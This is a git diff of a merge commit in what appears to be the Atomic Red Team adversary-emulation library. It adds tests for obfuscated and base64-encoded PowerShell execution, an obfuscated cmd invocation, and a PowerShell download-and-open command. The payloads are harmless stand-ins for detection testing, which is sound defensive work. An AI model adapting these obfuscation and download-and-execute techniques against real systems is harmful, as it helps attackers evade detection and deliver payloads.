Merge branch 'master' into amashinchi-rc-patch-1

2021-07-27 07:49:43 -07:00
parent 2a3885fb14 4b51206aab
commit 1de3dd9eee
13 changed files with 252 additions and 1 deletions
@@ -798,6 +798,7 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par
 execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
 execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
 execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
+execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
 execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -818,6 +819,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6
 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
+execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
@@ -860,6 +862,7 @@ command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca617
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
+command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -528,6 +528,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
 command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
 command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
@@ -570,6 +571,7 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par
 execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
 execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
 execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
+execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
 execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -584,6 +586,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6
 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
+execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
@@ -1436,6 +1436,7 @@
  - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
  - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
  - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
+  - Atomic Test #19: PowerShell Command Execution [windows]
 - [T1059.006 Python](../../T1059.006/T1059.006.md)
  - Atomic Test #1: Execute shell script via python's command mode arguement [linux]
  - Atomic Test #2: Execute Python via scripts (Linux) [linux]
@@ -1470,6 +1471,7 @@
 - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
  - Atomic Test #1: Create and Execute Batch Script [windows]
  - Atomic Test #2: Writes text to a file and displays it. [windows]
+  - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
  - Atomic Test #1: WMI Reconnaissance Users [windows]
  - Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -1559,6 +1561,7 @@
  - Atomic Test #12: svchost writing a file to a UNC path [windows]
  - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
  - Atomic Test #14: whois file download [linux, macos]
+  - Atomic Test #15: File Download via PowerShell [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [macos, linux]
  - Atomic Test #2: Connection Proxy for macOS UI [macos]
@@ -960,6 +960,7 @@
  - Atomic Test #11: OSTAP Worming Activity [windows]
  - Atomic Test #12: svchost writing a file to a UNC path [windows]
  - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
+  - Atomic Test #15: File Download via PowerShell [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #3: portproxy reg key [windows]
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1038,6 +1039,7 @@
  - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
  - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
  - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
+  - Atomic Test #19: PowerShell Command Execution [windows]
 - T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
  - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -1063,6 +1065,7 @@
 - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
  - Atomic Test #1: Create and Execute Batch Script [windows]
  - Atomic Test #2: Writes text to a file and displays it. [windows]
+  - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
  - Atomic Test #1: WMI Reconnaissance Users [windows]
  - Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -60105,6 +60105,25 @@ execution:
          -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute
          -ErrorAction Stop'
        name: powershell
+    - name: PowerShell Command Execution
+      auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598
+      description: 'Use of obfuscated PowerShell to execute an arbitrary command;
+        outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection
+        Report by Red Canary.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        obfuscated_code:
+          description: 'Defaults to: Invoke-Expression with a "Write-Host" line.'
+          type: string
+          default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
+      executor:
+        command: 'powershell.exe -e  #{obfuscated_code}
+
+'
+        name: command_prompt
  T1059.006:
    technique:
      external_references:
@@ -61581,6 +61600,27 @@ execution:

 '
        name: command_prompt
+    - name: Suspicious Execution via Windows Command Shell
+      auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
+      description: 'Command line executed via suspicious invocation. Example is from
+        the 2021 Threat Detection Report by Red Canary.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_file:
+          description: File to output to
+          type: string
+          default: hello.txt
+        input_message:
+          description: Message to write to file
+          type: string
+          default: Hello, from CMD!
+      executor:
+        command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file}
+          & type #{output_file}\n"
+        name: command_prompt
  T1047:
    technique:
      id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
@@ -65221,6 +65261,27 @@ command-and-control:
        cleanup_command: 'rm -f #{output_file}

 '
+    - name: File Download via PowerShell
+      auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+      description: 'Use PowerShell to download and write an arbitrary file from the
+        internet. Example is from the 2021 Threat Detection Report by Red Canary.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_remote_file:
+          description: File to download
+          type: string
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
+        output_file:
+          description: File to write to
+          type: string
+          default: LICENSE.txt
+      executor:
+        command: "(New-Object Net.WebClient).DownloadString('#{target_remote_file}')
+          | Out-File #{output_file}; Invoke-Item #{output_file}\n"
+        name: powershell
  T1090.001:
    technique:
      external_references:
@@ -150,3 +150,15 @@ atomic_tests:
    command: |
      Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
    name: powershell
+
+- name: Obfuscated Command in PowerShell
+  auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
+  description: |
+    This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
+    name: powershell
+  
@@ -46,6 +46,8 @@ PowerShell commands/scripts can also be executed without directly invoking the <

 - [Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-18---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments)

+- [Atomic Test #19 - PowerShell Command Execution](#atomic-test-19---powershell-command-execution)
+

 <br/>

@@ -768,4 +770,37 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force



+<br/>
+<br/>
+
+## Atomic Test #19 - PowerShell Command Execution
+Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a538de64-1c74-46ed-aa60-b995ed302598
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| obfuscated_code | Defaults to: Invoke-Expression with a "Write-Host" line. | string | JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+powershell.exe -e  #{obfuscated_code}
+```
+
+
+
+
+
+
 <br/>
@@ -374,4 +374,20 @@ atomic_tests:
      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
  executor:
    command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop'
-    name: powershell
+    name: powershell
+
+- name: PowerShell Command Execution
+  auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598
+  description: |
+    Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  input_arguments:
+    obfuscated_code:
+      description: 'Defaults to: Invoke-Expression with a "Write-Host" line.'
+      type: string
+      default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
+  executor:
+    command: |
+      powershell.exe -e  #{obfuscated_code}
+    name: command_prompt
@@ -12,6 +12,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu

 - [Atomic Test #2 - Writes text to a file and displays it.](#atomic-test-2---writes-text-to-a-file-and-displays-it)

+- [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell)
+

 <br/>

@@ -101,4 +103,38 @@ del "#{file_contents_path}"



+<br/>
+<br/>
+
+## Atomic Test #3 - Suspicious Execution via Windows Command Shell
+Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d0eb3597-a1b3-4d65-b33b-2cda8d397f20
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | File to output to | string | hello.txt|
+| input_message | Message to write to file | string | Hello, from CMD!|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
+```
+
+
+
+
+
+
 <br/>
@@ -52,3 +52,23 @@ atomic_tests:
    cleanup_command: |
      del "#{file_contents_path}"
    name: command_prompt
+
+- name: Suspicious Execution via Windows Command Shell
+  auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
+  description: |
+    Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_file:
+      description: File to output to
+      type: string
+      default: hello.txt
+    input_message:
+      description: Message to write to file
+      type: string
+      default: Hello, from CMD!
+  executor:
+    command: |
+      %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
+    name: command_prompt
@@ -32,6 +32,8 @@

 - [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download)

+- [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell)
+

 <br/>

@@ -589,4 +591,38 @@ echo "Please install timeout and the whois package"



+<br/>
+<br/>
+
+## Atomic Test #15 - File Download via PowerShell
+Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| target_remote_file | File to download | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt|
+| output_file | File to write to | string | LICENSE.txt|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
+```
+
+
+
+
+
+
 <br/>
@@ -381,3 +381,23 @@ atomic_tests:
      timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
    cleanup_command: |
      rm -f #{output_file}
+
+- name: File Download via PowerShell
+  auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+  description: |
+    Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  input_arguments:
+    target_remote_file:
+      description: File to download
+      type: string
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
+    output_file:
+      description: File to write to
+      type: string
+      default: LICENSE.txt
+  executor:
+    command: |
+      (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
+    name: powershell
@@ -732,3 +732,6 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
 b8e747c3-bdf7-4d71-bce2-f1df2a057406
 a12b5531-acab-4618-a470-0dafb294a87a
 d400090a-d8ca-4be0-982e-c70598a23de9
+54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+d0eb3597-a1b3-4d65-b33b-2cda8d397f20
+a538de64-1c74-46ed-aa60-b995ed302598